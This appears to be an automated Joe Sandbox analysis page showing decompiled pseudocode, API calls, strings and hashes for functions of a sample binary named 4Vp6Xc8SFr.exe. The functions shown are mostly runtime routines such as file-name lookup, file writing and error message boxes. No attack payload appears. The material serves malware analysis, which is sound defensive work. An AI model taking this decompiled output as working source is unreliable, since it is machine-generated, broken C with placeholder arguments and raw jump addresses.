Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: b5dbd4086f1ebc6acc02e83ccdcd9f8863b27b7b6b52c990b24d3680f752c929
Instruction ID: c4faeeb689ebf7bc036577efb97a5ab3b36e216536f72d62141b9da85c6d4634
Opcode Fuzzy Hash: b5dbd4086f1ebc6acc02e83ccdcd9f8863b27b7b6b52c990b24d3680f752c929
Instruction Fuzzy Hash: A241E512A0928745FB26BB25A40137DEA60FBA07A4FD04277EE5C06ADBDF3DD4618710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E7DBC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00007FF77FF7DA8E7DBC(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
				long long _v56;
				void* __rdi;
				void* __rsi;
				void* __r14;
				void* _t30;
				intOrPtr _t36;
				intOrPtr _t42;
				intOrPtr* _t65;
				long long _t71;
				void* _t73;
				long long _t87;
				signed int _t88;
				intOrPtr* _t89;
				void* _t99;

				_t73 = __rcx;
				_a8 = __rbx;
				r14d = __ecx;
				if (__ecx == 0) goto 0xda8e7f2b;
				_t2 = _t73 - 1; // -1
				if (_t2 - 1 <= 0) goto 0xda8e7dfa;
				E00007FF77FF7DA8E4394(__rax);
				_t3 = _t88 + 0x16; // 0x16
				_t42 = _t3;
				 *__rax = _t42;
				E00007FF77FF7DA8E9D00();
				goto 0xda8e7f2b;
				r8d = 0x104;
				GetModuleFileNameW(??, ??, ??);
				_t89 =  *0xda91c768; // 0x25976da227a
				 *0xda91c740 = 0xda91c790;
				if (_t89 == 0) goto 0xda8e7e2a;
				if ( *_t89 != _t42) goto 0xda8e7e2d;
				_t65 =  &_a32;
				_a24 = _t88;
				_v56 = _t65;
				r8d = 0;
				_a32 = _t88;
				_t30 = E00007FF77FF7DA8E7BB8(0xda91c790, 0xda91c790, 0xda91c790, _t88, 0xda91c790, __r8,  &_a24, _t99);
				r8d = 2;
				E00007FF77FF7DA8E7D5C(_t30, _a24, _a32, __r8);
				_t71 = _t65;
				if (_t65 != 0) goto 0xda8e7e85;
				E00007FF77FF7DA8E4394(_t65);
				 *_t65 = 0xc;
				E00007FF77FF7DA8E9D68(_t65, _a24);
				goto 0xda8e7df3;
				_v56 =  &_a32;
				E00007FF77FF7DA8E7BB8(_t71, 0xda91c790, _t71, _t88, 0xda91c790, _t65 + _a24 * 8,  &_a24, _t99);
				if (r14d != 1) goto 0xda8e7ebd;
				_t36 = _a24 - 1;
				 *0xda91c758 = _t71;
				 *0xda91c748 = _t36;
				goto 0xda8e7f26;
				_a16 = _t88;
				0xda8f0e7c();
				if (_t36 == 0) goto 0xda8e7eec;
				E00007FF77FF7DA8E9D68( &_a32, _a16);
				_a16 = _t88;
				E00007FF77FF7DA8E9D68( &_a32, _t71);
				goto 0xda8e7f2b;
				_t87 = _a16;
				if ( *_t87 == _t88) goto 0xda8e7f07;
				if ( *((intOrPtr*)(_t87 + 8)) != _t88) goto 0xda8e7efb;
				 *0xda91c748 = 0;
				_a16 = _t88;
				 *0xda91c758 = _t87;
				E00007FF77FF7DA8E9D68(_t87 + 8, _t88 + 1);
				_a16 = _t88;
				E00007FF77FF7DA8E9D68(_t87 + 8, _t71);
				return _t36;
			}

0x7ff7da8e7dbc
0x7ff7da8e7dbc
0x7ff7da8e7dd1
0x7ff7da8e7dd6
0x7ff7da8e7ddc
0x7ff7da8e7de2
0x7ff7da8e7de4
0x7ff7da8e7de9
0x7ff7da8e7de9
0x7ff7da8e7dec
0x7ff7da8e7dee
0x7ff7da8e7df5
0x7ff7da8e7e01
0x7ff7da8e7e0c
0x7ff7da8e7e12
0x7ff7da8e7e19
0x7ff7da8e7e23
0x7ff7da8e7e28
0x7ff7da8e7e2d
0x7ff7da8e7e31
0x7ff7da8e7e39
0x7ff7da8e7e3e
0x7ff7da8e7e41
0x7ff7da8e7e4a
0x7ff7da8e7e53
0x7ff7da8e7e60
0x7ff7da8e7e65
0x7ff7da8e7e6b
0x7ff7da8e7e6d
0x7ff7da8e7e79
0x7ff7da8e7e7b
0x7ff7da8e7e80
0x7ff7da8e7e97
0x7ff7da8e7e9c
0x7ff7da8e7ea5
0x7ff7da8e7eaa
0x7ff7da8e7eac
0x7ff7da8e7eb3
0x7ff7da8e7ebb
0x7ff7da8e7ec1
0x7ff7da8e7ec8
0x7ff7da8e7ed1
0x7ff7da8e7ed7
0x7ff7da8e7edf
0x7ff7da8e7ee3
0x7ff7da8e7eea
0x7ff7da8e7eec
0x7ff7da8e7ef9
0x7ff7da8e7f05
0x7ff7da8e7f07
0x7ff7da8e7f0f
0x7ff7da8e7f13
0x7ff7da8e7f1a
0x7ff7da8e7f22
0x7ff7da8e7f26
0x7ff7da8e7f3d

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E7DEE

Part of subcall function 00007FF7DA8E9D68: RtlReleasePrivilege.NTDLL(?,?,?,00007FF7DA8F1D92,?,?,?,00007FF7DA8F1DCF,?,?,00000000,00007FF7DA8F2295,?,?,?,00007FF7DA8F21C7), ref: 00007FF7DA8E9D7E
Part of subcall function 00007FF7DA8E9D68: GetLastError.KERNEL32(?,?,?,00007FF7DA8F1D92,?,?,?,00007FF7DA8F1DCF,?,?,00000000,00007FF7DA8F2295,?,?,?,00007FF7DA8F21C7), ref: 00007FF7DA8E9D88

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7DA8DADC5), ref: 00007FF7DA8E7E0C

Strings

C:\Users\user\Desktop\4Vp6Xc8SFr.exe, xrefs: 00007FF7DA8E7DFA

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ErrorFileLastModuleNamePrivilegeRelease_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\4Vp6Xc8SFr.exe
API String ID: 1752791759-1369563247
Opcode ID: 423edd4b2681a8db9fd790100d8ed82b1a97c1d070a1c3962bce80031e073eba
Instruction ID: 8969b95f9412f05e38a9115bf6d1ebc9eb281ac98a7f6e7a9f58bb3ab5d8e94a
Opcode Fuzzy Hash: 423edd4b2681a8db9fd790100d8ed82b1a97c1d070a1c3962bce80031e073eba
Instruction Fuzzy Hash: 7A413F31A08A52C5F716BF25A4400BCB7A4FB54B94BD44077EE4D83B56DF3EE5618320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EC058 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E00007FF77FF7DA8EC058(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, void* __r10, void* __r11, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
				intOrPtr _v0;
				signed long long _v8;
				signed int _t41;
				signed long long _t62;
				short* _t67;
				signed int* _t68;
				void* _t91;
				void* _t102;
				void* _t103;

				_a8 = __rbx;
				_a24 = __rbp;
				E00007FF77FF7DA8DAD20(0x1470, __rax, __r10, __r11);
				_t62 =  *0xda90d008; // 0xde4e6c2f3c2e
				_a5176 = _t62 ^ _t91 - __rax;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t103 = _t102 + __r8;
				 *((long long*)(__rcx)) =  *((intOrPtr*)(0xda91ca20 + (__edx >> 6) * 8));
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if (__r8 - _t103 >= 0) goto 0xda8ec199;
				_t67 =  &_a40;
				if (__r8 - _t103 >= 0) goto 0xda8ec102;
				_t41 =  *__r8 & 0x0000ffff;
				if (_t41 != 0xa) goto 0xda8ec0ee;
				 *_t67 = 0xd;
				_t68 = _t67 + 2;
				 *_t68 = _t41;
				if ( &(_t68[0]) -  &_a1744 < 0) goto 0xda8ec0d0;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_v8 =  &_a1752;
				r9d = 0;
				E00007FF77FF7DA8EF008();
				if (0 == 0) goto 0xda8ec191;
				if (0 == 0) goto 0xda8ec181;
				_v8 = _v8 & 0x00000000;
				r8d = 0;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0xda8ec191;
				if (0 + _a24 < 0) goto 0xda8ec14e;
				 *((intOrPtr*)(__rcx + 4)) = __edi - r15d;
				goto 0xda8ec0c5;
				 *((intOrPtr*)(__rcx)) = GetLastError();
				return E00007FF77FF7DA8DACF0(_t39, 0, _a5176 ^ _t91 - __rax);
			}

0x7ff7da8ec058
0x7ff7da8ec05d
0x7ff7da8ec06f
0x7ff7da8ec077
0x7ff7da8ec081
0x7ff7da8ec092
0x7ff7da8ec0a0
0x7ff7da8ec0a4
0x7ff7da8ec0bc
0x7ff7da8ec0c2
0x7ff7da8ec0c5
0x7ff7da8ec0cb
0x7ff7da8ec0d3
0x7ff7da8ec0d5
0x7ff7da8ec0e0
0x7ff7da8ec0e7
0x7ff7da8ec0ea
0x7ff7da8ec0ee
0x7ff7da8ec100
0x7ff7da8ec102
0x7ff7da8ec10d
0x7ff7da8ec11b
0x7ff7da8ec12e
0x7ff7da8ec133
0x7ff7da8ec13d
0x7ff7da8ec146
0x7ff7da8ec14c
0x7ff7da8ec14e
0x7ff7da8ec163
0x7ff7da8ec16c
0x7ff7da8ec177
0x7ff7da8ec17f
0x7ff7da8ec186
0x7ff7da8ec18c
0x7ff7da8ec197
0x7ff7da8ec1c7

APIs

WriteFile.KERNEL32 ref: 00007FF7DA8EC16F
GetLastError.KERNEL32 ref: 00007FF7DA8EC191

Strings

U, xrefs: 00007FF7DA8EC11B

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: cbd666aba2bb15de6fc291f49156f042584acd825790bad85113b2b824c09ea5
Instruction ID: 4a64c5f184a8f9623ee4b0edb0a20097f71479b71b624e632fb12c652ac54429
Opcode Fuzzy Hash: cbd666aba2bb15de6fc291f49156f042584acd825790bad85113b2b824c09ea5
Instruction Fuzzy Hash: C441D262B18A41C6EB21EF25E8443ADA7A0FB98794FD04032EE8D87789DF3DD551C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EE458 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00007FF77FF7DA8EE458(long long __rbx, long long __rsi, long long _a8, long long _a16) {
				void* _v8;
				signed int _v24;
				short _v550;
				signed int _v552;
				void* _t38;
				signed long long _t54;
				signed long long _t55;
				signed short* _t57;
				signed short* _t59;
				void* _t67;

				_a8 = __rbx;
				_a16 = __rsi;
				_t54 =  *0xda90d008; // 0xde4e6c2f3c2e
				_t55 = _t54 ^ _t67 - 0x00000240;
				_v24 = _t55;
				_t59 =  &_v552;
				r8d = 0x20a;
				E00007FF77FF7DA8DC170();
				if (GetCurrentDirectoryW(??, ??) - 0x104 > 0) goto 0xda8ee4cc;
				if (_v552 == 0) goto 0xda8ee527;
				if (_v550 != 0x3a) goto 0xda8ee527;
				_t37 =  >  ? _v552 & 0x0000ffff : _t59 - 0x20;
				_t38 = ( >  ? _v552 & 0x0000ffff : _t59 - 0x20) - 0x40;
				goto 0xda8ee527;
				E00007FF77FF7DA8EDC90(_t59 - 0x61, _t59,  &_v552);
				_t57 = _t55;
				if (_t55 == 0) goto 0xda8ee4f4;
				if (GetCurrentDirectoryW(??, ??) != 0) goto 0xda8ee501;
				E00007FF77FF7DA8E4394(_t55);
				 *_t55 = 0xc;
				goto 0xda8ee51f;
				if ( *_t57 == 0) goto 0xda8ee51f;
				if (_t57[1] != 0x3a) goto 0xda8ee51f;
				_t41 =  >  ?  *_t57 & 0x0000ffff : _t59 - 0x20;
				_t42 = ( >  ?  *_t57 & 0x0000ffff : _t59 - 0x20) - 0x40;
				E00007FF77FF7DA8E9D68(_t55, _t57);
				_t26 = ( >  ?  *_t57 & 0x0000ffff : _t59 - 0x20) - 0x40;
				return E00007FF77FF7DA8DACF0(( >  ?  *_t57 & 0x0000ffff : _t59 - 0x20) - 0x40,  *_t57 & 0x0000ffff, _v24 ^ _t67 - 0x00000240);
			}

0x7ff7da8ee458
0x7ff7da8ee45d
0x7ff7da8ee46a
0x7ff7da8ee471
0x7ff7da8ee474
0x7ff7da8ee47e
0x7ff7da8ee483
0x7ff7da8ee489
0x7ff7da8ee4a3
0x7ff7da8ee4ac
0x7ff7da8ee4b4
0x7ff7da8ee4c4
0x7ff7da8ee4c7
0x7ff7da8ee4ca
0x7ff7da8ee4d6
0x7ff7da8ee4dd
0x7ff7da8ee4e3
0x7ff7da8ee4f2
0x7ff7da8ee4f4
0x7ff7da8ee4f9
0x7ff7da8ee4ff
0x7ff7da8ee504
0x7ff7da8ee50b
0x7ff7da8ee519
0x7ff7da8ee51c
0x7ff7da8ee522
0x7ff7da8ee527
0x7ff7da8ee54d

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF7DA8EE498
GetCurrentDirectoryW.KERNEL32 ref: 00007FF7DA8EE4EA

Strings

:, xrefs: 00007FF7DA8EE4AE

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 1b8146b38663a316925a53bb4948b4cb0bc62c59c16e45cc43a13628cf1b29fd
Instruction ID: 82c9c78bf414f511082255021e3625f2f7503b3aea1454c6abb25101f09aa1ce
Opcode Fuzzy Hash: 1b8146b38663a316925a53bb4948b4cb0bc62c59c16e45cc43a13628cf1b29fd
Instruction Fuzzy Hash: 5D21D262A08682C5FB21AB11D04426DB3B2FB98B44FC54076DE8D43286DF7DEA55C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D2770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FF77FF7DA8D2770(void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, char _a32, char _a1056, char _a3104, signed int _a5152, char _a5208) {
				void* __rbx;
				void* _t19;
				void* _t30;
				void* _t31;
				signed long long _t35;
				signed long long _t36;
				void* _t53;
				void* _t54;
				void* _t62;
				void* _t63;

				_t57 = __r8;
				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t19 = E00007FF77FF7DA8DAD20(0x1448, __rax, _t62, _t63);
				_t55 = _t54 - __rax;
				_t35 =  *0xda90d008; // 0xde4e6c2f3c2e
				_t36 = _t35 ^ _t54 - __rax;
				_a5152 = _t36;
				_t37 = __rcx;
				E00007FF77FF7DA8D1040(_t19);
				_a24 =  &_a5208;
				_a16 = 0;
				r8d = 0x400;
				E00007FF77FF7DA8E3B34(_t30, _t31,  *_t36 | 0x00000002,  &_a32, __r8, __rcx);
				r8d = 0x800;
				E00007FF77FF7DA8DC170();
				r8d = 0x400;
				E00007FF77FF7DA8D79A0(_t36, __rcx,  &_a3104,  &_a32, _t53, __r8);
				if (_t36 == 0) goto 0xda8d2849;
				r8d = 0x400;
				E00007FF77FF7DA8D79A0(_t36, _t37,  &_a1056, "Fatal error detected", _t53, _t57);
				r9d = 0x30;
				MessageBoxW(??, ??, ??, ??);
				goto 0xda8d2863;
				r9d = 0x30;
				return E00007FF77FF7DA8DACF0(MessageBoxA(??, ??, ??, ??), 0, _a5152 ^ _t55);
			}

0x7ff7da8d2770
0x7ff7da8d2770
0x7ff7da8d2775
0x7ff7da8d277a
0x7ff7da8d277f
0x7ff7da8d278b
0x7ff7da8d2790
0x7ff7da8d2793
0x7ff7da8d279a
0x7ff7da8d279d
0x7ff7da8d27a5
0x7ff7da8d27b0
0x7ff7da8d27b5
0x7ff7da8d27c2
0x7ff7da8d27cb
0x7ff7da8d27d8
0x7ff7da8d27e7
0x7ff7da8d27ed
0x7ff7da8d27f2
0x7ff7da8d2805
0x7ff7da8d280d
0x7ff7da8d280f
0x7ff7da8d2824
0x7ff7da8d2829
0x7ff7da8d2841
0x7ff7da8d2847
0x7ff7da8d2849
0x7ff7da8d287c

APIs

Part of subcall function 00007FF7DA8D79A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7DA8D79DA

MessageBoxW.USER32 ref: 00007FF7DA8D2841
MessageBoxA.USER32 ref: 00007FF7DA8D285D

Strings

Fatal error detected, xrefs: 00007FF7DA8D2815, 00007FF7DA8D284F

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Fatal error detected
API String ID: 1878133881-4025702859
Opcode ID: e64589603809c6563179afa31cc063d3115a20461626242b215755058f5ef0d7
Instruction ID: 09c06761bb31815aa465a404052e0505d083b182c8e9e88779f6d44de5741495
Opcode Fuzzy Hash: e64589603809c6563179afa31cc063d3115a20461626242b215755058f5ef0d7
Instruction Fuzzy Hash: D421A47262868291FB21A711F4517EEE364FB84788FC44036EE8D47696DF3CD215C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D2880 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FF77FF7DA8D2880(void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, char _a32, char _a1056, char _a3104, signed int _a5152, char _a5208) {
				void* __rbx;
				void* _t19;
				void* _t30;
				void* _t31;
				signed long long _t35;
				signed long long _t36;
				void* _t53;
				void* _t54;
				void* _t62;
				void* _t63;

				_t57 = __r8;
				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t19 = E00007FF77FF7DA8DAD20(0x1448, __rax, _t62, _t63);
				_t55 = _t54 - __rax;
				_t35 =  *0xda90d008; // 0xde4e6c2f3c2e
				_t36 = _t35 ^ _t54 - __rax;
				_a5152 = _t36;
				_t37 = __rcx;
				E00007FF77FF7DA8D1040(_t19);
				_a24 =  &_a5208;
				_a16 = 0;
				r8d = 0x400;
				E00007FF77FF7DA8E3B34(_t30, _t31,  *_t36 | 0x00000002,  &_a32, __r8, __rcx);
				r8d = 0x800;
				E00007FF77FF7DA8DC170();
				r8d = 0x400;
				E00007FF77FF7DA8D79A0(_t36, __rcx,  &_a3104,  &_a32, _t53, __r8);
				if (_t36 == 0) goto 0xda8d2959;
				r8d = 0x400;
				E00007FF77FF7DA8D79A0(_t36, _t37,  &_a1056, "Error detected", _t53, _t57);
				r9d = 0x30;
				MessageBoxW(??, ??, ??, ??);
				goto 0xda8d2973;
				r9d = 0x30;
				return E00007FF77FF7DA8DACF0(MessageBoxA(??, ??, ??, ??), 0, _a5152 ^ _t55);
			}

0x7ff7da8d2880
0x7ff7da8d2880
0x7ff7da8d2885
0x7ff7da8d288a
0x7ff7da8d288f
0x7ff7da8d289b
0x7ff7da8d28a0
0x7ff7da8d28a3
0x7ff7da8d28aa
0x7ff7da8d28ad
0x7ff7da8d28b5
0x7ff7da8d28c0
0x7ff7da8d28c5
0x7ff7da8d28d2
0x7ff7da8d28db
0x7ff7da8d28e8
0x7ff7da8d28f7
0x7ff7da8d28fd
0x7ff7da8d2902
0x7ff7da8d2915
0x7ff7da8d291d
0x7ff7da8d291f
0x7ff7da8d2934
0x7ff7da8d2939
0x7ff7da8d2951
0x7ff7da8d2957
0x7ff7da8d2959
0x7ff7da8d298c

APIs

Part of subcall function 00007FF7DA8D79A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7DA8D79DA

MessageBoxW.USER32 ref: 00007FF7DA8D2951
MessageBoxA.USER32 ref: 00007FF7DA8D296D

Strings

Error detected, xrefs: 00007FF7DA8D2925, 00007FF7DA8D295F

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error detected
API String ID: 1878133881-3513342764
Opcode ID: 68193cdc83b7fab7fc98566493fdd9e07c0501d384b8ccfc8adb870b89089dd9
Instruction ID: 1ebf4ac4d87b07b52c239a12310cab0128f6839bec8762b467d66b1b1ca75ace
Opcode Fuzzy Hash: 68193cdc83b7fab7fc98566493fdd9e07c0501d384b8ccfc8adb870b89089dd9
Instruction Fuzzy Hash: 8821A47262868291FB21A710F4517EEE364FB84788FC44036EE8D57696DF3CD215C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DEF00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF7DA8DEF44
RaiseException.KERNEL32 ref: 00007FF7DA8DEF8A

Strings

csm, xrefs: 00007FF7DA8DEF77

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: bd59b9720ee897d7d1652bd34f9af743e796f0d4fc22b8e7cfc7830ab81a6d3f
Instruction ID: 97dbde3b5d71cb860da9faffc84137b64a69edaef29c66b9854fe3e91e018ce8
Opcode Fuzzy Hash: bd59b9720ee897d7d1652bd34f9af743e796f0d4fc22b8e7cfc7830ab81a6d3f
Instruction Fuzzy Hash: 58114F32618B4182EB129F15E44026DB7A1FB98B94F9842B6EE8C07765DF3DD5618710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EEF5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF7DA8EEF5C(void* __ecx) {
				signed int _v16;
				signed long long _t11;
				signed long long _t12;
				signed long long _t15;

				_t8 = __ecx;
				_t11 =  *0xda90d008; // 0xde4e6c2f3c2e
				_t12 = _t11 ^ _t15;
				_v16 = _t12;
				if (__ecx - 0x1a <= 0) goto 0xda8eefa6;
				E00007FF77FF7DA8E4374(_t12);
				 *_t12 = 0xf;
				E00007FF77FF7DA8E4394(_t12);
				 *_t12 = 0xd;
				E00007FF77FF7DA8E9D00();
				return E00007FF77FF7DA8DACF0(0, _t8, _v16 ^ _t15);
			}

0x7ff7da8eef5c
0x7ff7da8eef62
0x7ff7da8eef69
0x7ff7da8eef6c
0x7ff7da8eef74
0x7ff7da8eef76
0x7ff7da8eef7b
0x7ff7da8eef81
0x7ff7da8eef86
0x7ff7da8eef8c
0x7ff7da8eefa5

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8EEF8C
GetDriveTypeW.KERNEL32 ref: 00007FF7DA8EEFCC

Strings

:, xrefs: 00007FF7DA8EEFB5

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 4b6db1c40c9d890671ff636fdf246fe8f5bd585064f0dc2380975813143fd2c7
Instruction ID: 56764db0fb45533eeef615550688b1813be8c187163606c3d8f6a03f65e012c8
Opcode Fuzzy Hash: 4b6db1c40c9d890671ff636fdf246fe8f5bd585064f0dc2380975813143fd2c7
Instruction Fuzzy Hash: 6D01B121A18202C6FB22BB60945127EE7A0FF64704FC400B7DD4C86292DE3EE664C624

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 4Vp6Xc8SFr.exePID: 6932, Parent PID: 5220COMMON

Execution Graph

Execution Coverage:	5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	932
Total number of Limit Nodes:	31

Executed Functions

Function 00007FF7DA8F4D70 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FF77FF7DA8F4D70(void* __eflags, void* __rax, signed short* __rcx, char _a16, char _a24) {
				void* _t10;
				intOrPtr _t23;
				void* _t29;
				signed short* _t31;
				intOrPtr _t36;
				signed long long _t42;

				_t29 = __rax;
				E00007FF77FF7DA8F4700(E00007FF77FF7DA8F46F8(_t10));
